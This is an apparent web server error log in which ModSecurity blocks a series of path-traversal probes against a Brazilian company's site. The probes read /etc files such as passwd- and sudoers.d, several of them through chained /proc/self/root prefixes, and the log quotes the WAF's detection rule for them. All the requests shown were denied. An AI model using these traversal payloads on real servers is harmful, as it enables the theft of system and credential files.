"bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08SvXLqtnMIWvjpaKrMgAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:39.047482 2026] [:error] [pid 9818:tid 140411599251200] [client 216.73.216.191:43326] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab08S11pVZ5mVmJwsFNCYQAAAFE"]
[Fri Mar 20 09:23:39.951449 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.241.31:38096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08S_qxLDW4GITHUkT6yQAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:41.663482 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.241.31:38110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08TTJ3M9BSuKP7CAYv0QAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:42.587748 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:42058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08Tta6ubjKNq_cu4boeQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:23:43.249095 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:38118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08T11pVZ5mVmJwsFNCZgAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:44.627425 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:38126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08UOoXxyEfFpUF8f-RnwAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:46.157751 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.241.31:38132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08UhCii7xarUs8iHZ47gAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:46.240994 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.228.61:55382] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab08Ul1pVZ5mVmJwsFNCawAAAEk"]
[Fri Mar 20 09:23:47.654945 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.241.31:56022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08UwF0L0L-SsrnPo55bQAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:48.871705 2026] [:error] [pid 31215:tid 140411708356352] [client 216.73.216.191:44078] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08VAF0L0L-SsrnPo55bwAAAsQ"]
[Fri Mar 20 09:23:49.178900 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:56024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08VfXLqtnMIWvjpaKrOgAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:50.583814 2026] [:error] [pid 31215:tid 140411624429312] [client 216.73.216.191:44202] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08VgF0L0L-SsrnPo55dgAAAs4"]
[Fri Mar 20 09:23:56.466262 2026] [mime_magic:error] [pid 11167:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:44558] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:23:58.294092 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.241.31:56026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08XQF0L0L-SsrnPo55fAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:00.179455 2026] [:error] [pid 11167:tid 140411582465792] [client 216.73.216.191:44748] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08YPHIg5MgXLBnicMIFwAAAdM"]
[Fri Mar 20 09:24:00.699284 2026] [:error] [pid 7893:tid 140411699963648] [client 216.73.216.191:44778] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08YBCii7xarUs8iHZ4_gAAAgU"]
[Fri Mar 20 09:24:00.779124 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.241.31:50560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08YBCii7xarUs8iHZ4_wAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:01.096066 2026] [:error] [pid 9818:tid 140411699963648] [client 216.73.216.191:44816] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08YV1pVZ5mVmJwsFNCfAAAAEU"]
[Fri Mar 20 09:24:01.363375 2026] [:error] [pid 31215:tid 140411641214720] [client 216.73.216.191:44822] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08YQF0L0L-SsrnPo55fwAAAsw"]
[Fri Mar 20 09:24:03.903229 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:50570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08Y_XLqtnMIWvjpaKrTQAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:05.835583 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:45696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08Zda6ubjKNq_cu4botAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:24:07.027715 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:50574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08Z9a6ubjKNq_cu4botgAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:07.295348 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.243.128:57112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08Z7ninkcc-iUj5ApvYwAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:24:08.627664 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.243.128:57112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08aLninkcc-iUj5ApvZQAAA48"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:24:09.692348 2026] [:error] [pid 10189:tid 140411716749056] [client 216.73.216.191:45466] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08aTJ3M9BSuKP7CAYv7QAAAIM"]
